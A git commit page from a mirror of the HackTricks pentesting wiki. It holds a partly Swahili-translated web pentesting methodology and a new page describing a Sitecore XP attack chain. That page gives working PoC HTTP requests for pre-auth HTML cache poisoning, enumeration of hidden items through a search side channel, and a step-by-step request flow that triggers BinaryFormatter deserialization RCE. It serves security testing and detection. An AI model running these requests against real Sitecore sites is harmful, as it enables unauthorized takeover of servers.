maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/deserialization/basic-.net-deserializati

Browse Source
This commit is contained in:
Translator 2025-09-08 03:19:54 +00:00
parent 131e0a8eb0
commit 71125a141d
5 changed files with 454 additions and 207 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
src/SUMMARY.md
View File

@ -447,6 +447,7 @@
- [NextJS](network-services-pentesting/pentesting-web/nextjs.md)
- [Nginx](network-services-pentesting/pentesting-web/nginx.md)
- [NodeJS Express](network-services-pentesting/pentesting-web/nodejs-express.md)
- [Sitecore](network-services-pentesting/pentesting-web/sitecore/README.md)
- [PHP Tricks](network-services-pentesting/pentesting-web/php-tricks-esp/README.md)
- [PHP - Useful Functions & disable_functions/open_basedir bypass](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/README.md)
- [disable_functions bypass - php-fpm/FastCGI](network-services-pentesting/pentesting-web/php-tricks-esp/php-useful-functions-disable_functions-open_basedir-bypass/disable_functions-bypass-php-fpm-fastcgi.md)
@ -929,4 +930,3 @@
- [Post Exploitation](todo/post-exploitation.md)
- [Investment Terms](todo/investment-terms.md)
- [Cookies Policy](todo/cookies-policy.md)

125
src/network-services-pentesting/pentesting-web/README.md
View File

@ -1,12 +1,12 @@
# 80,443 - Pentesting Web Methodology
# 80,443 - Pentesting Wavuti Mbinu
{{#include ../../banners/hacktricks-training.md}}
## Taarifa Msingi
## Taarifa za Msingi
Huduma ya web ni huduma ya **kawaida zaidi na yenye upana mkubwa**, na kuna aina nyingi tofauti za **vulnerabilities**.
Huduma ya wavuti ndiyo **huduma inayotokea zaidi na yenye upeo mpana**, na kuna **aina nyingi tofauti za udhaifu**.
**Port ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
**Bandari ya chaguo-msingi:** 80 (HTTP), 443(HTTPS)
```bash
PORT STATE SERVICE
80/tcp open http
@ -24,38 +24,38 @@ openssl s_client -connect domain.com:443 # GET / HTTP/1.0
web-api-pentesting.md
{{#endref}}
## Muhtasari wa Methodolojia
## Muhtasari wa Mbinu
> Katika methodolojia hii tutadhani kuwa utashambulia domain (au subdomain) na hiyo pekee. Kwa hivyo, unapaswa kutumia methodolojia hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyotambuliwa ndani ya wigo.
> Katika mbinu hii tutachukulia kwamba unalenga domain (au subdomain) na tu hiyo. Kwa hivyo, unapaswa kutumia mbinu hii kwa kila domain, subdomain au IP iliyogunduliwa ambayo ina web server isiyotambulika ndani ya upeo.
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumika na web server. Tafuta **mbinu** za kuzingatia wakati wa mtihani mzima ikiwa unaweza kutambua teknolojia hiyo.
- [ ] Je, kuna **udhaifu unaojulikana** katika toleo la teknolojia?
- [ ] Unatumia **well known tech**? Kuna **mbinu muhimu** za kupata taarifa zaidi?
- [ ] Je, kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Anzisha **general purposes scanners**. Haujui kama zitatoka na kitu au kupata taarifa ya kuvutia.
- [ ] Anza na **ukaguzi wa awali**: **robots**, **sitemap**, **404 error** na **SSL/TLS scan** (ikiwa HTTPS).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** faili zote, folda na **parameta zinazotumika.** Pia, angalia **uvumbuzi maalum**.
- [ ] _Kumbuka kwamba kila wakati saraka mpya inapotambulika wakati wa brute-forcing au spidering, inapaswa kuspider._
- [ ] **Directory Brute-Forcing**: Jaribu brute force saraka zote zilizogunduliwa ukitafuta **faili** na **saraka** mpya.
- [ ] _Kumbuka kwamba kila wakati saraka mpya inapotambuliwa wakati wa brute-forcing au spidering, inapaswa kufanywa Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona ikiwa unaweza kupata **backups** za **faili zilizogunduliwa** kwa kuongeza viambatisho vya backup vinavyojulikana.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta parameta zilizofichwa**.
- [ ] Mara unapokuwa umewataja yote **endpoints** zinazokubali **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Follow this checklist](../../pentesting-web/web-vulnerabilities-methodology.md)
- [ ] Anza kwa **kutambua** **teknolojia** zinazotumika na web server. Tafuta **tricks** za kuzingatia wakati wa mtihani ukifanikiwa kutambua tech.
- [ ] Kuna **udhaifu unaojulikana** wa toleo la teknolojia?
- [ ] Unatumia **well known tech**? Kuna **useful trick** yoyote ya kupata taarifa zaidi?
- [ ] Kuna **specialised scanner** ya kuendesha (kama wpscan)?
- [ ] Endesha **general purposes scanners**. Huwezi kujua kama zitapata kitu au zitapata taarifa za kuvutia.
- [ ] Anza na **initial checks**: **robots**, **sitemap**, **404** error na **SSL/TLS scan** (if **HTTPS**).
- [ ] Anza **spidering** ukurasa wa wavuti: Ni wakati wa **kutafuta** yote yanayowezekana ya **faili, folda** na **parameters being used.** Pia, angalia **special findings**.
- [ ] _Kumbuka kwamba kila unapogundua saraka mpya wakati wa brute-forcing au spidering, inapaswa kuwa spidered._
- [ ] **Directory Brute-Forcing**: Jaribu brute force saraka zote zilizogunduliwa ukitafuta faili na directories mpya.
- [ ] _Kumbuka kwamba kila unapogundua saraka mpya wakati wa brute-forcing au spidering, inapaswa kuwa Brute-Forced._
- [ ] **Backups checking**: Jaribu kuona kama unaweza kupata **backups** za **faili zilizogunduliwa** kwa kuongezea extensions za backup zinazojulikana.
- [ ] **Brute-Force parameters**: Jaribu **kutafuta vigezo vilivyo fiche**.
- [ ] Mara tu umeshapata na **tambulisha** yote yanayowezekana **endpoints** zinazopokea **user input**, angalia aina zote za **vulnerabilities** zinazohusiana nazo.
- [ ] [Fuata orodha hii](../../pentesting-web/web-vulnerabilities-methodology.md)
## Server Version (Je lina udhaifu?)
## Toleo la Server (Vulnerable?)
### Tambua
Angalia kama kuna **udhaifu unaojulikana** kwa **toleo** la server linaloendesha.\
Vichwa vya **HTTP** na **cookies** za majibu vinaweza kuwa vya msaada mkubwa kutambua **teknolojia** na/au **toleo** linalotumika. **Nmap scan** inaweza kutambua toleo la server, lakini pia zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb), [**webtech**](https://github.com/ShielderSec/webtech) au [**https://builtwith.com/**](https://builtwith.com) zinaweza kuwa za msaada:
**HTTP headers** na **cookies** za response zinaweza kuwa muhimu sana kutambua **teknolojia** na/au **toleo** zinazotumika. **Nmap scan** inaweza kutambua toleo la server, lakini pia inaweza kuwa muhimu zana [**whatweb**](https://github.com/urbanadventurer/WhatWeb)**,** [**webtech** ](https://github.com/ShielderSec/webtech) au [**https://builtwith.com/**](https://builtwith.com)**:**
```bash
whatweb -a 1 <URL> #Stealthy
whatweb -a 3 <URL> #Aggresive
webtech -u <URL>
webanalyze -host https://google.com -crawl 2
```
Tafuta **kwa** [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)
Tafuta [**vulnerabilities of the web application** **version**](../../generic-hacking/search-exploits.md)
### **Angalia kama kuna WAF**
@ -63,9 +63,9 @@ Tafuta **kwa** [**vulnerabilities of the web application** **version**](../../ge
- [**https://github.com/Ekultek/WhatWaf.git**](https://github.com/Ekultek/WhatWaf.git)
- [**https://nmap.org/nsedoc/scripts/http-waf-detect.html**](https://nmap.org/nsedoc/scripts/http-waf-detect.html)
### Mbinu za teknolojia za Web
### Mbinu za teknolojia za wavuti
Baadhi ya **mbinu** za **kutafuta udhaifu** katika **teknolojia** mbalimbali zinazotumika:
Baadhi ya **mbinu** za **finding vulnerabilities** katika teknolojia maarufu tofauti zinazotumika:
- [**AEM - Adobe Experience Cloud**](aem-adobe-experience-cloud.md)
- [**Apache**](apache.md)
@ -100,28 +100,29 @@ Baadhi ya **mbinu** za **kutafuta udhaifu** katika **teknolojia** mbalimbali zin
- [**Werkzeug**](werkzeug.md)
- [**Wordpress**](wordpress.md)
- [**Electron Desktop (XSS to RCE)**](electron-desktop-apps/index.html)
- [**Sitecore**](sitecore/index.html)
_Tafadhali zingatia kwamba **domeni ile ile** inaweza kutumia **teknolojia tofauti** katika **bandari**, **folda** na **subdomains** tofauti._\
Ikiwa programu ya wavuti inatumia **tech/platform** yoyote iliyotajwa hapo juu au **nyingine yoyote**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
_Zingatia kwamba **same domain** inaweza kutumia **different technologies** katika **ports**, **folders** na **subdomains**._\
Ikiwa web application inatumia **tech/platform listed before** au **any other**, usisahau **kutafuta mtandaoni** mbinu mpya (na nijulishe!).
### Ukaguzi wa Source Code
### Mapitio ya Source Code
Ikiwa **source code** ya programu inapatikana kwenye **github**, mbali na kufanya mwenyewe **White box test** ya programu, kuna **taarifa** ambazo zinaweza kuwa **zitumike** kwa ajili ya sasa ya **Black-Box testing**:
Ikiwa **source code** ya application inapatikana kwenye **github**, mbali na kufanya kwa **your own a White box test** ya application kuna **some information** ambazo zinaweza kuwa **useful** kwa **Black-Box testing** ya sasa:
- Je, kuna faili ya **Change-log or Readme or Version** au kitu chochote chenye **version info accessible** kupitia wavuti?
- Je, vipi na wapi zinahifadhiwa **credentials**? Je, kuna faili (inayopatikana?) yenye **credentials** (majina ya watumiaji au passwords)?
- Je, passwords ziko kwa **plain text**, **encrypted**, au ni algorithm gani ya **hashing** inayotumika?
- Je, inatumia **master key** yoyote kwa **encrypting** kitu? Ni **algorithm** gani inayotumika?
- Je, unaweza kufikia faili zozote kati ya hizi kwa **exploiting** udhaifu wowote?
- Je, kuna taarifa za kuvutia kwenye **github** (issues zilizotatuliwa na zisizotatuliwa)? Au katika **commit history** (labda password ilizingirwa ndani ya commit ya zamani)?
- Je, **credentials** zimehifadhiwa vipi na wapi? Je, kuna (inayoweza kupatikana?) **file** yenye credentials (usernames au passwords)?
- Je, **passwords** ziko katika **plain text**, **encrypted** au ni algorithimu gani ya **hashing algorithm** inatumiwa?
- Je, inatumia **master key** yoyote kwa ku-encrypt kitu? Ni **algorithm** gani inatumiwa?
- Je, unaweza **access any of these files** ukitumia udhaifu fulani?
- Je, kuna **interesting information in the github** (solved and not solved) **issues**? Au katika **commit history** (pengine kuna **password introduced inside an old commit**)?
{{#ref}}
code-review-tools.md
{{#endref}}
### Automatic scanners
### Skana za kiotomatiki
#### General purpose automatic scanners
#### Skana za kiotomatiki za matumizi ya jumla
```bash
nikto -h <URL>
whatweb -a 4 <URL>
@ -133,14 +134,14 @@ nuclei -ut && nuclei -target <URL>
# https://github.com/ignis-sec/puff (client side vulns fuzzer)
node puff.js -w ./wordlist-examples/xss.txt -u "http://www.xssgame.com/f/m4KKGHi2rVUN/?query=FUZZ"
```
#### Vichunguzi vya CMS
#### Skana za CMS
Ikiwa CMS inatumiwa usisahau **kukimbiza skana**, huenda ikapatikana kitu cha kuvutia:
Ikiwa CMS inatumiwa, usisahau **kufanya skana** — pengine unaweza kupata kitu cha kuvutia:
[**Clusterd**](https://github.com/hatRiot/clusterd)**:** [**JBoss**](jboss.md)**, ColdFusion, WebLogic,** [**Tomcat**](tomcat/index.html)**, Railo, Axis2, Glassfish**\
[**CMSScan**](https://github.com/ajinabraham/CMSScan): [**WordPress**](wordpress.md), [**Drupal**](drupal/index.html), **Joomla**, **vBulletin** tovuti kwa masuala ya usalama. (GUI)\
[**VulnX**](https://github.com/anouarbensaad/vulnx)**:** [**Joomla**](joomla.md)**,** [**Wordpress**](wordpress.md)**,** [**Drupal**](drupal/index.html)**, PrestaShop, Opencart**\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/index.html) **au** [**(M)oodle**](moodle.md)\
**CMSMap**: [**(W)ordpress**](wordpress.md)**,** [**(J)oomla**](joomla.md)**,** [**(D)rupal**](drupal/index.html) **or** [**(M)oodle**](moodle.md)\
[**droopscan**](https://github.com/droope/droopescan)**:** [**Drupal**](drupal/index.html)**,** [**Joomla**](joomla.md)**,** [**Moodle**](moodle.md)**, Silverstripe,** [**Wordpress**](wordpress.md)
```bash
cmsmap [-f W] -F -d <URL>
@ -148,45 +149,45 @@ wpscan --force update -e --url <URL>
joomscan --ec -u <URL>
joomlavs.rb #https://github.com/rastating/joomlavs
```
> Kwa wakati huu unapaswa tayari kuwa na baadhi ya habari kuhusu web server inayotumiwa na mteja (ikiwa data yoyote imetolewa) na mbinu za kuzingatia wakati wa mtihani. Ikiwa una bahati, umeweza hata kugundua CMS na kuendesha scanner.
> Kwa hatua hii unapaswa tayari kuwa na baadhi ya taarifa za Web server zinazotumiwa na mteja (ikiwa data yoyote imetolewa) na mbinu kadhaa za kuzingatia wakati wa mtihani. Ikiwa una bahati uliweza hata kupata CMS na kuendesha scanner.
## Ugunduzi wa Web Application Hatua kwa Hatua
## Step-by-step Web Application Discovery
> Tangu hapa tutaanza kuingiliana na web application.
> Kutoka hapa tutaanza kuingiliana na web application.
### Ukaguzi wa awali
### Initial checks
**Kurasa za default zenye taarifa za kuvutia:**
**Default pages with interesting info:**
- /robots.txt
- /sitemap.xml
- /crossdomain.xml
- /clientaccesspolicy.xml
- /.well-known/
- Angalia pia maoni (comments) kwenye kurasa kuu na za sekondari.
- Angalia pia maoni kwenye kurasa kuu na kurasa za pili.
**Kusababisha makosa**
**Forcing errors**
Web servers zinaweza **kutenda kwa njia isiyotab predictable** wakati data isiyo ya kawaida inapotumwa kwao. Hii inaweza kufungua **tadhaa** au **kufichua taarifa nyeti**.
Web servers zinaweza **kutenda kwa njia isiyotarajiwa** wakati data isiyo ya kawaida inapotumwa kwao. Hii inaweza kufungua **udhaifu** au kusababisha **kufichua taarifa nyeti**.
- Fikia **kurasa za uongo** kama /whatever_fake.php (.aspx,.html,.etc)
- **Ongeza "\[]", "]]", and "\[\["** katika **cookie values** na **parameter** values ili kuunda makosa
- Tengeneza kosa kwa kutoa input kama **`/~randomthing/%s`** mwishoni mwa **URL**
- Jaribu **HTTP Verbs** tofauti kama PATCH, DEBUG au zenye makosa kama FAKE
- Fikia kurasa za **fake** kama /whatever_fake.php (.aspx,.html,.etc)
- **Ongeza "\[]", "]]", and "\[["** katika **cookie values** na **parameter** values ili kusababisha makosa
- Zalisha kosa kwa kutoa input kama **`/~randomthing/%s`** mwishoni mwa **URL**
- Jaribu **different HTTP Verbs** kama PATCH, DEBUG au mbaya kama FAKE
#### **Angalia kama unaweza kupakia files (**[**PUT verb, WebDav**](put-method-webdav.md)**)**
Kama utagundua kuwa **WebDav** iko **imewezeshwa** lakini huna ruhusa za kutosha za **kupakia files** kwenye folder la root jaribu:
Ikiwa utagundua kwamba **WebDav** imewezeshwa lakini huna ruhusa za kutosha za **uploading files** kwenye root folder jaribu:
- **Brute Force** credentials
- **Upload files** kupitia WebDav kwenye **sehemu zilizobaki** za **found folders** ndani ya ukurasa wa wavuti. Huenda una ruhusa za kupakia files katika folda nyingine.
- **Upload files** via WebDav kwenye **rest** ya **found folders** ndani ya web page. Huenda ukaweza kuwa na ruhusa za kupakia files katika folda nyingine.
### **SSL/TLS vulnerabilites**
- Ikiwa application **hainatii matumizi ya HTTPS** katika sehemu yoyote, basi iko **hatarini kwa MitM**
- Ikiwa application inatuma data nyeti (passwords) kutumia HTTP. Hii ni hatari kubwa.
- Ikiwa application **isn't forcing the user of HTTPS** sehemu yoyote, basi ni **vulnerable to MitM**
- Ikiwa application inatumia **HTTP** kutuma data nyeti (passwords). Hii ni vulnerability kubwa.
Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kukagua **vulnerabilities** (Katika programu za Bug Bounty labda aina hizi za vulnerabilities hazitakubaliwa) na tumia [**a2sv**](https://github.com/hahwul/a2sv) kwa kukagua tena vulnerabilities:
Tumia [**testssl.sh**](https://github.com/drwetter/testssl.sh) kuangalia **vulnerabilities** (Katika Bug Bounty programs pengine aina hizi za vulnerabilities hazitakubaliwa) na tumia [**a2sv**](https://github.com/hahwul/a2sv) ili kukagua tena vulnerabilities:
```bash
./testssl.sh [--htmlfile] 10.10.10.10:443
#Use the --htmlfile to save the output inside an htmlfile also
@ -202,13 +203,13 @@ Information about SSL/TLS vulnerabilities:
### Spidering
Launch some kind of **spider** inside the web. The goal of the spider is to **find as much paths as possible** from the tested application. Therefore, web crawling and external sources should be used to find as much valid paths as possible.
Launch some kind of **spider** inside the web. Lengo la **spider** ni **kupata njia nyingi iwezekanavyo** kutoka kwenye application inayotestwa. Kwa hivyo, web crawling na vyanzo vya nje zinapaswa kutumika kupata njia halali nyingi iwezekanavyo.
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com, AlienVault.com).
- [**gospider**](https://github.com/jaeles-project/gospider) (go): HTML spider, LinkFinder in JS files and external sources (Archive.org, CommonCrawl.org, VirusTotal.com).
- [**hakrawler**](https://github.com/hakluke/hakrawler) (go): HML spider, with LinkFider for JS files and Archive.org as external source.
- [**dirhunt**](https://github.com/Nekmo/dirhunt) (python): HTML spider, also indicates "juicy files".
- [**evine** ](https://github.com/saeeddhqan/evine)(go): Interactive CLI HTML spider. It also searches in Archive.org
- [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. You can just indicate a file with hosts and a file with paths and meg will fetch each path on each host and save the response.
- [**meg**](https://github.com/tomnomnom/meg) (go): This tool isn't a spider but it can be useful. Unaweza kutoa tu faili yenye hosts na faili yenye paths na meg itachukua kila path kwa kila host na kuhifadhi response.
- [**urlgrab**](https://github.com/IAmStoxe/urlgrab) (go): HTML spider with JS rendering capabilities. However, it looks like it's unmaintained, the precompiled version is old and the current code doesn't compile
- [**gau**](https://github.com/lc/gau) (go): HTML spider that uses external providers (wayback, otx, commoncrawl)
- [**ParamSpider**](https://github.com/devanshbatham/ParamSpider): This script will find URLs with parameter and will list them.
@ -267,12 +268,12 @@ Tools:
- _/usr/share/wordlists/dirb/big.txt_
- _/usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt_
_Note that anytime a new directory is discovered during brute-forcing or spidering, it should be Brute-Forced._
_Tafuta kwamba kila wakati directory mpya inapogunduliwa wakati wa brute-forcing au spidering, inapaswa kufanyiwa Brute-Force._
### What to check on each file found
- [**Broken link checker**](https://github.com/stevenvachon/broken-link-checker): Find broken links inside HTMLs that may be prone to takeovers
- **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ You can also use the tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **File Backups**: Once you have found all the files, look for backups of all the executable files ("_.php_", "_.aspx_"...). Common variations for naming a backup are: _file.ext\~, #file.ext#, \~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old._ Unaweza pia kutumia tool [**bfac**](https://github.com/mazen160/bfac) **or** [**backup-gen**](https://github.com/Nishantbhagat57/backup-gen)**.**
- **Discover new parameters**: You can use tools like [**Arjun**](https://github.com/s0md3v/Arjun)**,** [**parameth**](https://github.com/maK-/parameth)**,** [**x8**](https://github.com/sh1yo/x8) **and** [**Param Miner**](https://github.com/PortSwigger/param-miner) **to discover hidden parameters. If you can, you could try to search** hidden parameters on each executable web file.
- _Arjun all default wordlists:_ [https://github.com/s0md3v/Arjun/tree/master/arjun/db](https://github.com/s0md3v/Arjun/tree/master/arjun/db)
- _Param-miner “params” :_ [https://github.com/PortSwigger/param-miner/blob/master/resources/params](https://github.com/PortSwigger/param-miner/blob/master/resources/params)
@ -299,7 +300,7 @@ _Note that anytime a new directory is discovered during brute-forcing or spideri
- **Javascript Deobfuscator and Unpacker:** [https://lelinhtinh.github.io/de4js/](https://lelinhtinh.github.io/de4js/), [https://www.dcode.fr/javascript-unobfuscator](https://www.dcode.fr/javascript-unobfuscator)
- **Javascript Beautifier:** [http://jsbeautifier.org/](https://beautifier.io), [http://jsnice.org/](http://jsnice.org)
- **JsFuck deobfuscation** (javascript with chars:"\[]!+" [https://enkhee-osiris.github.io/Decoder-JSFuck/](https://enkhee-osiris.github.io/Decoder-JSFuck/))
- [**TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- **TrainFuck**](https://github.com/taco-c/trainfuck)**:** `+72.+29.+7..+3.-67.-12.+55.+24.+3.-6.-8.-67.-23.`
- On several occasions, you will need to **understand the regular expressions** used. This will be useful: [https://regex101.com/](https://regex101.com) or [https://pythonium.net/regex](https://pythonium.net/regex)
- You could also **monitor the files were forms were detected**, as a change in the parameter or the apearance f a new form may indicate a potential new vulnerable functionality.

194
src/network-services-pentesting/pentesting-web/sitecore/README.md Normal file
View File

@ -0,0 +1,194 @@
# Sitecore Experience Platform (XP) Preauth HTML Cache Poisoning to Postauth RCE
{{#include ../../../banners/hacktricks-training.md}}
Ukurasa huu unatoa muhtasari wa mnyororo wa shambulio wa vitendo dhidi ya Sitecore XP 10.4.1 unaotoka kutoka kwenye preauth XAML handler hadi HTML cache poisoning na, kupitia authenticated UI flow, kufikia RCE kupitia BinaryFormatter deserialization. Mbinu hizi zinaweza kutumika kwa matoleo/vitengo vya Sitecore vinavyofanana na zinatoa primitives za kujaribu, kugundua, na kuimarisha.
- Bidhaa iliyoathiriwa iliyojaribiwa: Sitecore XP 10.4.1 rev. 011628
- Imerekebishwa katika: KB1003667, KB1003734 (Juni/Julai 2025)
Angalia pia:
{{#ref}}
../../../pentesting-web/cache-deception/README.md
{{#endref}}
{{#ref}}
../../../pentesting-web/deserialization/README.md
{{#endref}}
## Preauth primitive: XAML Ajax reflection → HtmlCache write
Entrypoint is the preauth XAML handler registered in web.config:
```xml
<add verb="*" path="sitecore_xaml.ashx" type="Sitecore.Web.UI.XamlSharp.Xaml.XamlPageHandlerFactory, Sitecore.Kernel" name="Sitecore.XamlPageRequestHandler" />
```
Inapatikana kupitia:
```
GET /-/xaml/Sitecore.Shell.Xaml.WebControl
```
Mti wa controls unajumuisha AjaxScriptManager ambayo, kwenye maombi ya matukio, husoma maeneo yaliyodhibitiwa na mshambuliaji na kwa kutumia reflection huitekeleza methods kwenye controls zilizolengwa:
```csharp
// AjaxScriptManager.OnPreRender
string clientId = page.Request.Form["__SOURCE"]; // target control
string text = page.Request.Form["__PARAMETERS"]; // Method("arg1", "arg2")
...
Dispatch(clientId, text);
// eventually → DispatchMethod(control, parameters)
MethodInfo m = ReflectionUtil.GetMethodFiltered<ProcessorMethodAttribute>(this, e.Method, e.Parameters, true);
if (m != null) m.Invoke(this, e.Parameters);
// Alternate branch for XML-based controls
if (control is XmlControl && AjaxScriptManager.DispatchXmlControl(control, args)) {...}
```
Uchunguzi muhimu: ukurasa la XAML una mfano wa XmlControl (xmlcontrol:GlobalHeader). Sitecore.XmlControls.XmlControl inatokana na Sitecore.Web.UI.WebControl (darasa la Sitecore), ambalo linapitisha ReflectionUtil.Filter allowlist (Sitecore.*), likifungua methods kwenye Sitecore WebControl.
Magic method for poisoning:
```csharp
// Sitecore.Web.UI.WebControl
protected virtual void AddToCache(string cacheKey, string html) {
HtmlCache c = CacheManager.GetHtmlCache(Sitecore.Context.Site);
if (c != null) c.SetHtml(cacheKey, html, this._cacheTimeout);
}
```
Kwa sababu tunaweza kulenga xmlcontrol:GlobalHeader na kuita Sitecore.Web.UI.WebControl methods kwa jina, tunapata preauth arbitrary HtmlCache write primitive.
### Ombi la PoC (CVE-2025-53693)
```
POST /-/xaml/Sitecore.Shell.Xaml.WebControl HTTP/2
Host: target
Content-Type: application/x-www-form-urlencoded
__PARAMETERS=AddToCache("wat","<html><body>pwn</body></html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
Vidokezo:
- __SOURCE ni clientID ya xmlcontrol:GlobalHeader ndani ya Sitecore.Shell.Xaml.WebControl (kwa kawaida thabiti kama ctl00_ctl00_ctl05_ctl03 kwa kuwa hutokana na XAML isiyobadilika).
- __PARAMETERS muundo ni Method("arg1","arg2").
## Nini cha poison: Ujenzi wa Cache key
Ujenzi wa kawaida wa HtmlCache key unaotumiwa na Sitecore controls:
```csharp
public virtual string GetCacheKey(){
SiteContext site = Sitecore.Context.Site;
if (this.Cacheable && (site == null || site.CacheHtml) && !this.SkipCaching()){
string key = this.CachingID.Length > 0 ? this.CachingID : this.CacheKey;
if (key.Length > 0){
string k = key + "_#lang:" + Language.Current.Name.ToUpperInvariant();
if (this.VaryByData) k += ResolveDataKeyPart();
if (this.VaryByDevice) k += "_#dev:" + Sitecore.Context.GetDeviceName();
if (this.VaryByLogin) k += "_#login:" + Sitecore.Context.IsLoggedIn;
if (this.VaryByUser) k += "_#user:" + Sitecore.Context.GetUserName();
if (this.VaryByParm) k += "_#parm:" + this.Parameters;
if (this.VaryByQueryString && site?.Request != null)
k += "_#qs:" + MainUtil.ConvertToString(site.Request.QueryString, "=", "&");
if (this.ClearOnIndexUpdate) k += "_#index";
return k;
}
}
return string.Empty;
}
```
Mfano wa targeted poisoning kwa sublayout inayojulikana:
```
__PARAMETERS=AddToCache("/layouts/Sample+Sublayout.ascx_%23lang:EN_%23login:False_%23qs:_%23index","<html>…attacker HTML…</html>")&__SOURCE=ctl00_ctl00_ctl05_ctl03&__ISEVENT=1
```
## Kuorodhesha vipengee vinavyoweza kuwekwa kwenye cache na vipimo vya “vary by”
Ikiwa ItemService imefunuliwa (kibaya) kwa watu wasiojulikana, unaweza kuorodhesha vipengee vinavyoweza kuwekwa kwenye cache ili kupata funguo sahihi.
Jaribio la haraka:
```
GET /sitecore/api/ssc/item
// 404 Sitecore error body → exposed (anonymous)
// 403 → blocked/auth required
```
Orodhesha vitu vinavyoweza kuhifadhiwa kwenye cache na bendera:
```
GET /sitecore/api/ssc/item/search?term=layouts&fields=&page=0&pagesize=100
```
Angalia sehemu kama Path, Cacheable, VaryByDevice, VaryByLogin, ClearOnIndexUpdate. Majina ya vifaa yanaweza kuorodheshwa kupitia:
```
GET /sitecore/api/ssc/item/search?term=_templatename:Device&fields=ItemName&page=0&pagesize=100
```
### Sidechannel enumeration chini ya vitambulisho vilivyo na vikwazo (CVE-2025-53694)
Hata pale ItemService inapojifanya akaunti iliyopunguzwa (e.g., ServicesAPI) na kurudisha array tupu ya Results, TotalCount bado inaweza kuonyesha preACL Solr hits. Unaweza bruteforce item groups/ids kwa wildcards na kutazama TotalCount ikijikusanya ili kuchora ramani ya internal content na devices:
```
GET /sitecore/api/ssc/item/search?term=%2B_templatename:Device;%2B_group:a*&fields=&page=0&pagesize=100&includeStandardTemplateFields=true
→ "TotalCount": 3
GET /...term=%2B_templatename:Device;%2B_group:aa*
→ "TotalCount": 2
GET /...term=%2B_templatename:Device;%2B_group:aa30d078ed1c47dd88ccef0b455a4cc1*
→ narrow to a specific item
```
## Postauth RCE: BinaryFormatter sink katika convertToRuntimeHtml (CVE-2025-53691)
Sink:
```csharp
// Sitecore.Convert
byte[] b = Convert.FromBase64String(data);
return new BinaryFormatter().Deserialize(new MemoryStream(b));
```
Inapatikana kupitia hatua ya pipeline convertToRuntimeHtml ConvertWebControls, ambayo inatafuta element yenye id {iframeId}_inner na hufanya base64 decode + deserializes yake, kisha inaingiza string inayotokana ndani ya HTML:
```csharp
HtmlNode inner = doc.SelectSingleNode("//*[@id='"+id+"_inner']");
string text2 = inner?.GetAttributeValue("value", "");
if (text2.Length > 0)
htmlNode2.InnerHtml = StringUtil.GetString(Sitecore.Convert.Base64ToObject(text2) as string);
```
Chochea (iliyothibitishwa, haki za Content Editor). Dialogi ya FixHtml inaita convertToRuntimeHtml. Mchakato kamili bila kubofya UI:
```
// 1) Start Content Editor
GET /sitecore/shell/Applications/Content%20Editor.aspx
// 2) Load malicious HTML into EditHtml session (XAML event)
POST /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.EditHtml.aspx
Content-Type: application/x-www-form-urlencoded
__PARAMETERS=edithtml:fix&...&ctl00$ctl00$ctl05$Html=
<html>
<iframe id="test" src="poc" value="poc"></iframe>
<test id="test_inner" value="BASE64_GADGET"></test>
</html>
// 3) Server returns a session handle (hdl) for FixHtml
{"command":"ShowModalDialog","value":"/sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=..."}
// 4) Visit FixHtml to trigger ConvertWebControls → deserialization
GET /sitecore/shell/-/xaml/Sitecore.Shell.Applications.ContentEditor.Dialogs.FixHtml.aspx?hdl=...
```
Gadget generation: use ysoserial.net / YSoNet with BinaryFormatter to produce a base64 payload returning a string. The strings contents are written into the HTML by ConvertWebControls after deserialization sideeffects execute.
{{#ref}}
../../../pentesting-web/deserialization/basic-.net-deserialization-objectdataprovider-gadgets-expandedwrapper-and-json.net.md
{{#endref}}
## Mnyororo kamili
1) Mshambulizi wa Preauth anachafua HtmlCache na HTML yoyote kwa kuitisha kwa reflective WebControl.AddToCache kupitia XAML AjaxScriptManager.
2) HTML iliyochafuliwa hutumikia JavaScript inayomshawishi mtumiaji aliye authenticated wa Content Editor kupitia mtiririko wa FixHtml.
3) Ukurasa wa FixHtml unasababisha convertToRuntimeHtml → ConvertWebControls, ambayo inadekodeserializa base64 inayoendeshwa na mshambuliaji kupitia BinaryFormatter → RCE chini ya identity ya app pool ya Sitecore.
## Ugunduzi
- Preauth XAML: maombi kwa `/-/xaml/Sitecore.Shell.Xaml.WebControl` yenye `__ISEVENT=1`, `__SOURCE` isiyo ya kawaida na `__PARAMETERS=AddToCache(...)`.
